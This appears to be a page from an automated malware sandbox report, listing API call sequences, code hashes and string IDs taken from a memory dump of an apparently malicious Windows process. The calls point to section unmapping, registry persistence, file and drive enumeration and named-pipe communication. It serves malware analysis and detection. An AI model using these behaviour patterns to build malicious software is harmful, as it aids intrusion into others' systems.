  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
